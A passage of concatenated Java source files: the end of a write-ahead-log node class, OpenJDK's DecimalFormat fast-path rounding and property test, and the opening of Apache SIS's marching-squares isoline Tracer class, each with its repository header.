needUpdatingFilesToSearch = true; } // update iterator if (!insertNodes.isEmpty()) { itr = insertNodes.listIterator(); return true; } return false; } @Override public IndexedConsensusRequest next() { if (itr == null && !hasNext()) { throw new NoSuchElementException(); } IndexedConsensusRequest request = itr.next(); nextSearchIndex = request.getSearchIndex() + 1; return request; } @Override public void waitForNextReady() throws InterruptedException { boolean walFileRolled = false; long bufferLastSearchIndex = 0; while (!hasNext()) { if (!walFileRolled) { boolean timeout = !buffer.waitForFlush(WAIT_FOR_NEXT_WAL_ENTRY_TIMEOUT_IN_SEC, TimeUnit.SECONDS); if (timeout) { bufferLastSearchIndex = buffer.getCurrentSearchIndex(); logger.info( "timeout when waiting for next WAL entry ready, execute rollWALFile. Current search index in wal buffer is {}, and next target index is {}", bufferLastSearchIndex, nextSearchIndex); rollWALFile(); walFileRolled = true; } } else { // only wait when the search index of the buffer remains the same as the previous check long finalBufferLastSearchIndex = bufferLastSearchIndex; buffer.waitForFlush(buf -> buf.getCurrentSearchIndex() == finalBufferLastSearchIndex); } } } @Override public void waitForNextReady(long time, TimeUnit unit) throws InterruptedException, TimeoutException { if (!hasNext()) { boolean timeout = !buffer.waitForFlush(time, unit); if (timeout || !hasNext()) { throw new TimeoutException(); } } } @Override public void skipTo(long targetIndex) { if (targetIndex < nextSearchIndex) { logger.warn( "Skip from {} to {}, it's a dangerous operation because insert plan {} may have been lost.", nextSearchIndex, targetIndex, targetIndex); } if (itr != null && itr.hasNext() && insertNodes.get(itr.nextIndex()).getSearchIndex() <= targetIndex && targetIndex <= insertNodes.getLast().getSearchIndex()) { while (itr.hasNext()) { IndexedConsensusRequest request = itr.next(); if (targetIndex == request.getSearchIndex()) { itr.previous(); nextSearchIndex = targetIndex; return; } } } reset(); nextSearchIndex = targetIndex; } /** Reset all params except nextSearchIndex */ private void reset() { insertNodes.clear(); itr = null; filesToSearch = null; currentFileIndex = -1; brokenFileId = -1; needUpdatingFilesToSearch = true; } private void updateFilesToSearch() { File[] filesToSearch = WALFileUtils.listAllWALFiles(logDirectory); WALFileUtils.ascSortByVersionId(filesToSearch); int fileIndex = WALFileUtils.binarySearchFileBySearchIndex(filesToSearch, nextSearchIndex); logger.debug( "searchIndex: {}, result: {}, files: {}, ", nextSearchIndex, fileIndex, filesToSearch); // (xingtanzjr) When the target entry does not exist, the reader will return minimum one whose // searchIndex is larger than target searchIndex if (fileIndex == -1) { fileIndex = 0; } // skip broken files while (fileIndex < filesToSearch.length - 1 && WALFileUtils.parseVersionId(filesToSearch[fileIndex].getName()) <= brokenFileId) { fileIndex++; } if (filesToSearch != null && (fileIndex >= 0 && fileIndex < filesToSearch.length - 1)) { // possible to find next this.filesToSearch = filesToSearch; this.currentFileIndex = fileIndex; this.needUpdatingFilesToSearch = false; } else { // impossible to find next this.filesToSearch = null; this.currentFileIndex = -1; this.needUpdatingFilesToSearch = true; } } } @Override public long getCurrentSearchIndex() { return buffer.getCurrentSearchIndex(); } @Override public long getCurrentWALFileVersion() { return buffer.getCurrentWALFileVersion(); } @Override public long getTotalSize() { return WALManager.getInstance().getTotalDiskUsage(); } // endregion @Override public void close() { buffer.close(); } public String getIdentifier() { return identifier; } public File getLogDirectory() { return logDirectory; } /** Get the .wal file starts with the specified version id */ public File getWALFile(long versionId) throws FileNotFoundException { return WALFileUtils.getWALFile(logDirectory, versionId); } /** Return true when all wal entries all consumed and flushed */ public boolean isAllWALEntriesConsumed() { return buffer.isAllWALEntriesConsumed(); } /** Roll wal file */ public void rollWALFile() { WALEntry rollWALFileSignal = new WALSignalEntry(WALEntryType.ROLL_WAL_LOG_WRITER_SIGNAL, true); WALFlushListener walFlushListener = log(rollWALFileSignal); if (!deleted && walFlushListener.waitForResult() == AbstractResultListener.Status.FAILURE) { logger.error( "Fail to trigger rolling wal node-{}'s wal file log writer.", identifier, walFlushListener.getCause()); } } public long getDiskUsage() { return buffer.getDiskUsage(); } public long getFileNum() { return buffer.getFileNum(); } public int getRegionId(long memtableId) { return checkpointManager.getRegionId(memtableId); } @TestOnly long getCurrentLogVersion() { return buffer.getCurrentWALFileVersion(); } @TestOnly CheckpointManager getCheckpointManager() { return checkpointManager; } @TestOnly public void setBufferSize(int size) { buffer.setBufferSize(size); } @TestOnly public WALBuffer getWALBuffer() { return buffer; } }
openjdk/jdk8
35,821
jdk/test/java/text/Format/DecimalFormat/RoundingAndPropertyTest.java
/* * Copyright (c) 2012, Oracle and/or its affiliates. All rights reserved. * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This code is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 2 only, as * published by the Free Software Foundation. * * This code is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License * version 2 for more details (a copy is included in the LICENSE file that * accompanied this code). * * You should have received a copy of the GNU General Public License version * 2 along with this work; if not, write to the Free Software Foundation, * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. * * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA * or visit www.oracle.com if you need additional information or have any * questions. */ /* @test * @bug 7050528 * @summary Test java.text.DecimalFormat fast-path for format(double...) * @author Olivier Lagneau * @run main RoundingAndPropertyTest * */ /* ----------------------------------------------------------------------------- * Note : * Since fast-path algorithm does not modify any feature of DecimalFormat, * some tests or values in this program may have to be adapted/added/removed * when any change has been done in the fast-path source code, because the * conditions for exercising fast-path may change. * * This is specially true if the set of constraints to fall in the fast-path * case is relaxed in any manner. * * Usage : * - Run main without any argument to test against a set of golden values and * associated results hard-coded in the source code. That will do the tests * described below * See below comment section named "Description". * * or * * - Run main with string argument "-gengold" to output source code of * GoldenFormattedValues.java class file with the jdk version used while * generating the code. * See below comment section named : "Modifying Golden Values". * * In case of error while running the test, a Runtime exception is generated * providing the numbers of errors detected (format of golden values checks and * property changes checks), and the program exit. * * Description : * * This test first checks that localization of digits is done correctly when * calling DecimalFormat.format() on the array of values DecimalLocalizationValues * found in GoldenDoubleValues, using the locale FullLocalizationTestLocale * (from GoldenDoubleValues) that implies localization of digits. it checks the * the results against expected returned string. In case of formatting error, * it provides a message informing which value was wrongly formatted. * * Then it checks the results of calling NumberFormat.format(double) on a set * of predefined golden values and checks results against expected returned * string. It does this both for the decimal case, with an instance returned * NumberFormat.getInstance() call and for the currency case, with an instance * returned by NumberFormat.getCurrencyInstance(). Almost all the tested double * values satisfy the constraints assumed by the fast-path algorithm for * format(double ...). Some are voluntarily outside the scope of fast-path to * check that the algorithm correctly eliminate them. In case of formatting * error a message provides information on the golden value raising the error * (value, exact decimal value (using BidDecimal), expected result, formatted result). * * Last the test checks the status and behavior of a DecimalFormat instance * when changing properties that make this instance satisfy/invalidate its * fast-path status, depending on the predefined set of fast-path constraints. * * The golden results are predefined arrays of int[] containing the unicode * ints of the chars in the expected formatted string, when using locale * provided in GoldenDoubleValues class. The results are those obtained by * using a reference jdk version (for example one that does not contains the * DecimalFormat fast-path algorithm, like jdk80-b25). * * The double values from which we get golden results are stored inside two * arrays of double values: * - DecimalGoldenValues for testing NumberFormat.getInstance(). * - CurrencyGoldenValues for testing NumberFormat.getCurrencyInstance(). * These arrays are located in GoldenDoubleValues.java source file. * * For each double value in the arrays above, there is an associated golden * result. These results are stored in arrays of int[]: * - DecimalGoldenFormattedValues for expected decimal golden results. * - CurrencyGoldenFormattedValues for expected currency golden results. * - DecimalDigitsLocalizedFormattedValues for expected localized digit results. * * We store the results in int[] arrays containing the expected unicode values * because the compiler that will compile the containing java file may use a * different locale than the one registered in GoldenDoubleValues.java. These * arrays are located in a separate GoldenFormattedValues.java source file * that is generated by RoundingAndPropertyTest using "-gengold" parameter. * See below "Modifying Golden Values". * * The golden value arrays can be expanded, modified ... to test additional * or different double values. In that case, the source file of class * GoldenFormattedValues must be regenerated to replace the existing one.. * * Modifying Golden Values : * * In order to ease further modification of the list of double values checked * and associated golden results, the test includes the method * generatesGoldenFormattedValuesClass() that writes on standard output stream * the source code for GoldenFormattedValues class that includes the expected * results arrays. * * Here are the steps to follow for updating/modifying golden values and results: * 1- Edit GoldenDoubleValues.java to add/remove/modify golden or localization * values. * 2- Run main with "-gengold" string argument with a target jdk. * (at the creation of this test file, the target jdk used was jdk1.8.0-ea). * 2- Copy this java code that has been writen on standard output and replace * GoldenFormattedValues.java contents by the generated output. * 3- Check that this updated code compiles. * [4]- If needed replaces existing GoldenDoubleValues and GoldenFormattedValues * files in jdk/test section, respectively by the one modified at step 1 and * generated at step 2. * ----------------------------------------------------------------------------- */ import java.util.*; import java.text.NumberFormat; import java.text.DecimalFormat; import java.text.DecimalFormatSymbols; import java.math.RoundingMode; import java.math.BigDecimal; public class RoundingAndPropertyTest { // Prints on standard output stream the unicode values of chars as a // comma-separated list of int values private static void printUnicodeValuesArray(char[] chars) { for (int i = 0; i < chars.length; i++) { System.out.print((int) chars[i]); if (i != (chars.length - 1)) System.out.print(", "); } } // Converts given array of unicode values as an array of chars. // Returns this converted array. private static char[] getCharsFromUnicodeArray(int[] unicodeValues) { char[] chars = new char[unicodeValues.length]; for (int i = 0; i < unicodeValues.length; i++) { chars[i] = (char) unicodeValues[i]; } return chars; } /* Prints on standard output stream the java code of resulting * GoldenFormattedValues class for the golden values found in * class GoldenDoubleValues. */ private static void generatesGoldenFormattedValuesClass() { String fourWhiteSpaces = " "; String eightWhiteSpaces = " "; // Prints header without Copyright header. System.out.println("/* This is a machine generated file - Please DO NOT EDIT !"); System.out.println(" * Change RoundingAndPropertyTest instead,"); System.out.println(" * and run with \"-gengold\" argument to regenerate (without copyright header)."); System.out.println(" */"); System.out.println(); System.out.println("/* This file contains the set of result Strings expected from calling inside"); System.out.println(" * RoundingAndPropertyTest the method NumberFormat.format() upon the set of"); System.out.println(" * double values provided in GoldenDoubleValues.java. It contains three arrays,"); System.out.println(" * each containing arrays of unicode values representing the expected string"); System.out.println(" * result when calling format() on the corresponding (i.e. same index) double"); System.out.println(" * value found in GoldenDoubleValues arrays :"); System.out.println(" * - DecimalDigitsLocalizedFormattedValues corresponds to DecimalLocalizationValues,"); System.out.println(" * when using FullLocalizationTestLocale to format."); System.out.println(" * - DecimalGoldenFormattedValues corresponds to DecimalGoldenValues, when used"); System.out.println(" * in the decimal pattern case together with TestLocale."); System.out.println(" * - CurrencyGoldenFormattedValues corresponds to CurrencyGoldenValues. when used"); System.out.println(" * in the currency pattern case together with TestLocale."); System.out.println(" * Please see documentation in RoundingAndPropertyTest.java for more details."); System.out.println(" *"); System.out.println(" * This file generated by running RoundingAndPropertyTest with \"-gengold\" argument."); System.out.println(" */"); System.out.println(); // Prints beginning of class GoldenFormattedValues. System.out.println("class GoldenFormattedValues {"); System.out.println(); System.out.println( fourWhiteSpaces + "// The formatted values below were generated from golden values"); System.out.print( fourWhiteSpaces + "// listed in GoldenDoubleValues.java,"); System.out.println(" using the following jvm version :"); System.out.println( fourWhiteSpaces + "// " + System.getProperty("java.vendor") + " " + System.getProperty("java.vm.name") + " " + System.getProperty("java.version")); System.out.println( fourWhiteSpaces + "// locale for golden double values : " + GoldenDoubleValues.TestLocale); System.out.println( fourWhiteSpaces + "// locale for testing digit localization : " + GoldenDoubleValues.FullLocalizationTestLocale); System.out.println(); // Prints the expected results when digit localization happens System.out.println( fourWhiteSpaces + "// The array of int[] unicode values storing the expected results"); System.out.print( fourWhiteSpaces + "// when experiencing full localization of digits"); System.out.println(" on DecimalLocalizationValues."); System.out.println( fourWhiteSpaces + "static int[][] DecimalDigitsLocalizedFormattedValues = {"); NumberFormat df = NumberFormat.getInstance(GoldenDoubleValues.FullLocalizationTestLocale); for (int i = 0; i < GoldenDoubleValues.DecimalLocalizationValues.length; i++) { double d = GoldenDoubleValues.DecimalLocalizationValues[i]; String formatted = df.format(d); char[] decFmtChars = formatted.toCharArray(); System.out.print(eightWhiteSpaces + "{ "); printUnicodeValuesArray(decFmtChars); System.out.println(" },"); } System.out.println(fourWhiteSpaces + "};"); System.out.println(); // Prints the golden expected results for the decimal pattern case System.out.println( fourWhiteSpaces + "// The array of int[] unicode values storing the expected results"); System.out.print( fourWhiteSpaces + "// when calling Decimal.format(double)"); System.out.println(" on the decimal GoldenDoubleValues."); System.out.println( fourWhiteSpaces + "static int[][] DecimalGoldenFormattedValues = {"); df = NumberFormat.getInstance(GoldenDoubleValues.TestLocale); for (int i = 0; i < GoldenDoubleValues.DecimalGoldenValues.length; i++) { double d = GoldenDoubleValues.DecimalGoldenValues[i]; String formatted = df.format(d); char[] decFmtChars = formatted.toCharArray(); System.out.print(eightWhiteSpaces + "{ "); printUnicodeValuesArray(decFmtChars); System.out.println(" },"); } System.out.println(fourWhiteSpaces + "};"); System.out.println(); // Prints the golden expected results for the currency pattern case System.out.println( fourWhiteSpaces + "// The array of int[] unicode values storing the expected results"); System.out.print( fourWhiteSpaces + "// when calling Decimal.format(double)"); System.out.println(" on the currency GoldenDoubleValues."); System.out.println( fourWhiteSpaces + "static int[][] CurrencyGoldenFormattedValues = {"); NumberFormat cf = NumberFormat.getCurrencyInstance(GoldenDoubleValues.TestLocale); for (int i = 0; i < GoldenDoubleValues.CurrencyGoldenValues.length; i++) { double d = GoldenDoubleValues.CurrencyGoldenValues[i]; String formatted = cf.format(d); char[] decFmtChars = formatted.toCharArray(); System.out.print(eightWhiteSpaces + "{ "); printUnicodeValuesArray(decFmtChars); System.out.println(" },"); } System.out.println(fourWhiteSpaces + "};"); System.out.println(); // Prints end of GoldenFormattedValues class. System.out.println("}"); } private static int testLocalizationValues() { DecimalFormat df = (DecimalFormat) NumberFormat.getInstance(GoldenDoubleValues.FullLocalizationTestLocale); double[] localizationValues = GoldenDoubleValues.DecimalLocalizationValues; int size = localizationValues.length; int successCounter = 0; int failureCounter = 0; for (int i = 0; i < size; i++) { double d = localizationValues[i]; String formatted = df.format(d); char[] expectedUnicodeArray = getCharsFromUnicodeArray( GoldenFormattedValues.DecimalDigitsLocalizedFormattedValues[i]); String expected = new String(expectedUnicodeArray); if (!formatted.equals(expected)) { failureCounter++; System.out.println( "--- Localization error for value d = " + d + ". Exact value = " + new BigDecimal(d).toString() + ". Expected result = " + expected + ". Output result = " + formatted); } else successCounter++; } System.out.println("Checked positively " + successCounter + " golden decimal values out of " + size + " tests. There were " + failureCounter + " format failure"); return failureCounter; } private static int testGoldenValues(java.text.DecimalFormat df, java.text.DecimalFormat cf) { double[] goldenDecimalValues = GoldenDoubleValues.DecimalGoldenValues; int decimalSize = goldenDecimalValues.length; int decimalSuccessCounter = 0; int decimalFailureCounter = 0; for (int i = 0; i < decimalSize; i++) { double d = goldenDecimalValues[i]; String formatted = df.format(d); char[] expectedUnicodeArray = getCharsFromUnicodeArray( GoldenFormattedValues.DecimalGoldenFormattedValues[i]); String expected = new String(expectedUnicodeArray); if (!formatted.equals(expected)) { decimalFailureCounter++; System.out.println( "--- Error for golden value d = " + d + ". Exact value = " + new BigDecimal(d).toString() + ". Expected result = " + expected + ". Output result = " + formatted); } else decimalSuccessCounter++; } System.out.println("Checked positively " + decimalSuccessCounter + " golden decimal values out of " + decimalSize + " tests. There were " + decimalFailureCounter + " format failure"); double[] goldenCurrencyValues = GoldenDoubleValues.CurrencyGoldenValues; int currencySize = goldenCurrencyValues.length; int currencySuccessCounter = 0; int currencyFailureCounter = 0; for (int i = 0; i < currencySize; i++) { double d = goldenCurrencyValues[i]; String formatted = cf.format(d); char[] expectedUnicodeArray = getCharsFromUnicodeArray( GoldenFormattedValues.CurrencyGoldenFormattedValues[i]); String expected = new String(expectedUnicodeArray); if (!formatted.equals(expected)) { currencyFailureCounter++; System.out.println( "--- Error for golden value d = " + d + ". Exact value = " + new BigDecimal(d).toString() + ". Expected result = " + expected + ". Output result = " + formatted); } else currencySuccessCounter++; } System.out.println("Checked positively " + currencySuccessCounter + " golden currency values out of " + currencySize + " tests. There were " + currencyFailureCounter + " format failure"); return (decimalFailureCounter + currencyFailureCounter); } // Checks that the two passed s1 and s2 string are equal, and prints // out message in case of error. private static boolean resultsEqual(String propertyName, String s1, String s2) { boolean equality = s1.equals(s2); if (!equality) System.out.println( "\n*** Error while reverting to default " + propertyName + " property.\n" + " initial output = " + s1 + ". reverted output = " + s2 + "."); else System.out.println(" Test passed."); return equality; } /* This methods checks the behaviour of the management of properties * of a DecimalFormat instance that satisfies fast-path constraints. * * It does this by comparing the results of the format(double) output * obtained from initial fast-path state with the output provided by * the same instance that has been pushed and exercised outside * fast-path rules and finally "reverted" to its initial fast-path state. * * The schema of actions is this : * - Call format(double) on a known DecimalFormat fast-path instance, * and store this result. * - Record the current state of a given property. * - Change the property to invalidate the fast-path state. * - Call again format(double) on the instance. * - Revert state of property to validate again fast-path context. * - Call format(double) again. * - Check that first and last call to format(double) provide same result * - Record failure if any. * - Do the same for another property with the same instance. * So all the property changes are chained one after the other on only the * same instance. * * Some properties that currently do not influence the fast-path state * are also tested. This is not useful with current fast-path source * but is here for testing the whole set of properties. This is the case * for prefixes and suffixes, and parseBigDecimal properties. */ private static int testSettersAndFastPath(DecimalFormat df, boolean isCurrency) { final double d1 = GoldenDoubleValues.PROPERTY_CHECK_POSITIVE_VALUE; final double d2 = GoldenDoubleValues.PROPERTY_CHECK_NEGATIVE_VALUE; int errors = 0; boolean testSucceeded = false; String firstFormatResult; String secondFormatResult; String propertyName; // ---- positivePrefix property test ---- testSucceeded = false; propertyName = "positivePrefix"; System.out.print("Checking " + propertyName + " property."); String initialPrefix = df.getPositivePrefix(); firstFormatResult = df.format(d1); df.setPositivePrefix("positivePrefix:"); df.format(d1); df.setPositivePrefix(initialPrefix); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- positiveSuffix property test ---- testSucceeded = false; propertyName = "positiveSuffix"; System.out.print("Checking " + propertyName + " property."); String initialSuffix = df.getPositiveSuffix(); firstFormatResult = df.format(d1); df.setPositiveSuffix("positiveSuffix:"); df.format(d1); df.setPositiveSuffix(initialSuffix); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName,firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- negativePrefix property test ---- testSucceeded = false; propertyName = "negativePrefix"; System.out.print("Checking " + propertyName + " property."); initialPrefix = df.getNegativePrefix(); firstFormatResult = df.format(d1); df.setNegativePrefix("negativePrefix:"); df.format(d1); df.setNegativePrefix(initialPrefix); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- negativeSuffix property test ---- testSucceeded = false; propertyName = "negativeSuffix"; System.out.print("Checking " + propertyName + " property."); initialSuffix = df.getNegativeSuffix(); firstFormatResult = df.format(d1); df.setNegativeSuffix("negativeSuffix:"); df.format(d1); df.setNegativeSuffix(initialSuffix); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- multiplier property test ---- testSucceeded = false; propertyName = "multiplier"; System.out.print("Checking " + propertyName + " property."); int initialMultiplier = df.getMultiplier(); firstFormatResult = df.format(d1); df.setMultiplier(10); df.format(d1); df.setMultiplier(initialMultiplier); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- groupingUsed property test ---- testSucceeded = false; propertyName = "groupingUsed"; System.out.print("Checking " + propertyName + " property."); boolean initialGroupingUsed = df.isGroupingUsed(); firstFormatResult = df.format(d1); df.setGroupingUsed(!initialGroupingUsed); df.format(d1); df.setGroupingUsed(initialGroupingUsed); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- groupingSize property test ---- testSucceeded = false; propertyName = "groupingSize"; System.out.print("Checking " + propertyName + " property."); int initialGroupingSize = df.getGroupingSize(); firstFormatResult = df.format(d1); df.setGroupingSize(initialGroupingSize + 1); df.format(d1); df.setGroupingSize(initialGroupingSize); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- decimalSeparatorAlwaysShown property test ---- testSucceeded = false; propertyName = "decimalSeparatorAlwaysShown"; System.out.print("Checking " + propertyName + " property."); boolean initialDSShown = df.isDecimalSeparatorAlwaysShown(); firstFormatResult = df.format(d1); df.setDecimalSeparatorAlwaysShown(!initialDSShown); df.format(d1); df.setDecimalSeparatorAlwaysShown(initialDSShown); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- parseBigDecimal property test ---- testSucceeded = false; propertyName = "parseBigDecimal"; System.out.print("Checking " + propertyName + " property."); boolean initialParseBigdecimal = df.isParseBigDecimal(); firstFormatResult = df.format(d1); df.setParseBigDecimal(!initialParseBigdecimal); df.format(d1); df.setParseBigDecimal(initialParseBigdecimal); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- maximumIntegerDigits property test ---- testSucceeded = false; propertyName = "maximumIntegerDigits"; System.out.print("Checking " + propertyName + " property."); int initialMaxIDs = df.getMaximumIntegerDigits(); firstFormatResult = df.format(d1); df.setMaximumIntegerDigits(8); df.format(d1); df.setMaximumIntegerDigits(initialMaxIDs); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- minimumIntegerDigits property test ---- testSucceeded = false; propertyName = "minimumIntegerDigits"; System.out.print("Checking " + propertyName + " property."); int initialMinIDs = df.getMinimumIntegerDigits(); firstFormatResult = df.format(d1); df.setMinimumIntegerDigits(2); df.format(d1); df.setMinimumIntegerDigits(initialMinIDs); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- maximumFractionDigits property test ---- testSucceeded = false; propertyName = "maximumFractionDigits"; System.out.print("Checking " + propertyName + " property."); firstFormatResult = df.format(d1); df.setMaximumFractionDigits(8); df.format(d1); if (isCurrency) { df.setMinimumFractionDigits(2); df.setMaximumFractionDigits(2); } else { df.setMinimumFractionDigits(0); df.setMaximumFractionDigits(3); } secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- minimumFractionDigits property test ---- testSucceeded = false; propertyName = "minimumFractionDigits"; System.out.print("Checking " + propertyName + " property."); firstFormatResult = df.format(d1); df.setMinimumFractionDigits(1); df.format(d1); if (isCurrency) { df.setMinimumFractionDigits(2); df.setMaximumFractionDigits(2); } else { df.setMinimumFractionDigits(0); df.setMaximumFractionDigits(3); } secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- currency property test ---- testSucceeded = false; propertyName = "currency"; System.out.print("Checking " + propertyName + " property."); Currency initialCurrency = df.getCurrency(); Currency japanCur = java.util.Currency.getInstance(Locale.JAPAN); firstFormatResult = df.format(d1); df.setCurrency(japanCur); df.format(d1); df.setCurrency(initialCurrency); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- roundingMode property test ---- testSucceeded = false; propertyName = "roundingMode"; System.out.print("Checking " + propertyName + " property."); RoundingMode initialRMode = df.getRoundingMode(); firstFormatResult = df.format(d1); df.setRoundingMode(RoundingMode.HALF_UP); df.format(d1); df.setRoundingMode(RoundingMode.HALF_EVEN); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- decimalFormatSymbols property test ---- testSucceeded = false; propertyName = "decimalFormatSymbols"; System.out.print("Checking " + propertyName + " property."); DecimalFormatSymbols initialDecimalFormatSymbols = df.getDecimalFormatSymbols(); firstFormatResult = df.format(d1); Locale bizarreLocale = new Locale("fr", "FR"); DecimalFormatSymbols unusualSymbols = new DecimalFormatSymbols(bizarreLocale); unusualSymbols.setDecimalSeparator('@'); unusualSymbols.setGroupingSeparator('|'); df.setDecimalFormatSymbols(unusualSymbols); df.format(d1); df.setDecimalFormatSymbols(initialDecimalFormatSymbols); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; testSucceeded = false; System.out.print("Checking " + propertyName + " property."); initialDecimalFormatSymbols = df.getDecimalFormatSymbols(); firstFormatResult = df.format(d1); Locale japanLocale = Locale.JAPAN; unusualSymbols = new DecimalFormatSymbols(japanLocale); unusualSymbols.setDecimalSeparator('9'); unusualSymbols.setGroupingSeparator('0'); df.setDecimalFormatSymbols(unusualSymbols); df.format(d1); df.setDecimalFormatSymbols(initialDecimalFormatSymbols); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; return errors; } // Main for RoundingAndPropertyTest. We test first the golden values, // and then the property setters and getters. public static void main(String[] args) { if ((args.length >= 1) && (args[0].equals("-gengold"))) generatesGoldenFormattedValuesClass(); else { System.out.println("\nChecking correctness of formatting with digit localization."); System.out.println("============================================================="); int localizationErrors = testLocalizationValues(); if (localizationErrors != 0) System.out.println("*** Failure in localization tests : " + localizationErrors + " errors detected "); else System.out.println(" Tests for full localization of digits all passed."); DecimalFormat df = (DecimalFormat) NumberFormat.getInstance(GoldenDoubleValues.TestLocale); DecimalFormat cf = (DecimalFormat) NumberFormat.getCurrencyInstance(GoldenDoubleValues.TestLocale); System.out.println("\nChecking correctness of formating for golden values."); System.out.println("============================================================="); int goldenValuesErrors = testGoldenValues(df,cf); if (goldenValuesErrors != 0) System.out.println("*** Failure in goldenValues tests : " + goldenValuesErrors + " errors detected "); else System.out.println(" Tests for golden values all passed."); System.out.println("\nChecking behavior of property changes for decimal case."); System.out.println("============================================================="); int decimalTestsErrors = testSettersAndFastPath(df, false); if (decimalTestsErrors != 0) System.out.println("*** Failure in decimal property changes tests : " + decimalTestsErrors + " errors detected "); else System.out.println(" Tests for decimal property changes all passed."); System.out.println("\nChecking behavior of property changes for currency case."); System.out.println("============================================================="); int currencyTestsErrors = testSettersAndFastPath(cf, true); if (currencyTestsErrors != 0) System.out.println("*** Failure in currency property changes tests : " + currencyTestsErrors + " errors detected "); else System.out.println(" Tests for currency property chamges all passed."); if ((localizationErrors > 0) || (goldenValuesErrors > 0) || (decimalTestsErrors > 0) || (currencyTestsErrors > 0)) throw new RuntimeException( "Failed with " + (localizationErrors + goldenValuesErrors + decimalTestsErrors + currencyTestsErrors) + " error(s)."); } } }
apache/sis
34,811
endorsed/src/org.apache.sis.feature/main/org/apache/sis/image/processing/isoline/Tracer.java
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.sis.image.processing.isoline; import java.util.Map; import java.util.HashMap; import java.util.IdentityHashMap; import java.awt.Point; import java.awt.Rectangle; import java.awt.Shape; import java.awt.geom.Path2D; import org.opengis.referencing.operation.MathTransform; import org.opengis.referencing.operation.TransformException; import org.apache.sis.geometry.wrapper.j2d.PathBuilder; import org.apache.sis.util.Debug; /** * Iterator over contouring grid cells together with an interpolator and an assembler of polyline segments. * A single instance of this class is created by {@code Isolines.generate(…)} for all bands to process in a * given image. {@code Tracer} is used for doing a single iteration over all image pixels. * * @author Johann Sorel (Geomatys) * @author Martin Desruisseaux (Geomatys) * * @see <a href="https://en.wikipedia.org/wiki/Marching_squares">Marching squares on Wikipedia</a> */ final class Tracer { /** * Mask to apply on {@link Level#isDataAbove} for telling that value in a corner is higher than the level value. * Values are defined in {@code PixelIterator.Window} iteration order: from left to right, then top to bottom. * * <p>Note: there is some hard-coded dependencies to those exact values. * If values are changed, search for example for {@code log2(UPPER_RIGHT)} in comments.</p> */ static final int UPPER_LEFT = 1, UPPER_RIGHT = 2, LOWER_LEFT = 4, LOWER_RIGHT = 8; /** * The 2×2 window containing pixel values in the 4 corners of current contouring grid cell. * Values are always stored with band index varying fastest, then column index, then row index. * The length of this array is <var>(number of bands)</var> × 2 (width) × 2 (height). */ private final double[] window; /** * Increment to the position for reading next sample value. * It corresponds to the number of bands in {@link #window}. */ private final int pixelStride; /** * Pixel coordinate on the left side of the cell where to interpolate. * The range is 0 inclusive to {@code domain.width} exclusive. */ int x; /** * Pixel coordinate on the top side of the cell where to interpolate. * The range is 0 inclusive to {@code domain.height} exclusive. */ int y; /** * Translation to apply on coordinates. For isolines computed sequentially, this is the image origin * (often 0,0 but not necessarily). For isolines computed in parallel, the translations are different * for each computation tile. */ private final double translateX, translateY; /** * Final transform to apply on coordinates (integer source coordinates at pixel centers). * Can be {@code null} if none. */ private final MathTransform gridToCRS; /** * Creates a new position for the given data window. * * @param window the 2×2 window containing pixel values in the 4 corners of current contouring grid cell. * @param pixelStride increment to the position in {@code window} for reading next sample value. * @param domain pixel coordinates where iteration will happen. * @param gridToCRS final transform to apply on coordinates (integer source coordinates at pixel centers). */ Tracer(final double[] window, final int pixelStride, final Rectangle domain, final MathTransform gridToCRS) { this.window = window; this.pixelStride = pixelStride; this.translateX = 